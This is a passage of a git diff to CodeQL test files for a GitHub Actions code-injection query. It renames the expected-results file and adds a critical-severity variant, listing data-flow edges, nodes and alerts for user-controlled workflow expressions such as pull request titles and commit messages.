| github.event.review.body | ${{ github.event.review.body }} | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref new file mode 100644 index 00000000000..9af8ec0f9ab --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-094/CodeInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected similarity index 74% rename from ql/test/query-tests/Security/CWE-094/CodeInjection.expected rename to ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e47c6dd340c..298c4ce75a4 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -9,8 +9,6 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | -| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | @@ -46,6 +44,8 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | @@ -77,6 +77,10 @@ edges | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | nodes +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | @@ -93,10 +97,6 @@ nodes | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | semmle.label | steps.changed-files3.outputs.all_changed_files | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | semmle.label | Uses Step: changed-files5 | | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | semmle.label | steps.changed-files5.outputs.all_changed_files | -| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | -| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | @@ -201,6 +201,10 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | @@ -256,8 +260,31 @@ nodes | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | subpaths #select +| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | 